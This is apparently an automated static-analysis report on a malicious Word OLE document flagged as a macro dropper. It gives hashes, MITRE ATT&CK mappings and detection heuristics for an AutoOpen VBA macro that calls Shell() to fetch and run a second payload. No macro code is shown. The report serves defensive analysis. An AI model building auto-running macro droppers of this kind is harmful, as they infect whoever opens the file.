Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a91fac67e6858848…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 92.0 KB
Created: 2018-06-27 08:00:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: 1ac8af7a62e024e34c88612db507ab95
SHA-1: 297a9598e72337e98326a9ee9b300a2758b56c86
SHA-256: a91fac67e6858848a850745cd99737d105fb0e0d841fe5c179dc062e24ef6adb
Risk score: 242

Malware Insights

MITRE ATT&CK: T1059.005 (Visual Basic), T1204.002 (Malicious File)

The sample is a malicious OLE document containing a VBA macro. The macro calls the Shell() function, a critical heuristic indicating execution of arbitrary commands, which strongly suggests that its purpose is to download and execute a secondary payload. The ClamAV detection (Doc.Dropper.Agent-6593331-0) also confirms that the file is malicious.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6593331-0 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6593331-0
  • VBA macros detected (medium; OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical; OLE_VBA_SHELL)
    The VBA code contains a call to Shell()
  • AutoOpen macro (high; OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   7413 bytes
SHA-256: abdbc22c81ac3f18582a02e594e44d1cd07f017c186e971e9901c668c18e849c

Preview script (first 1,000 lines of the extracted script)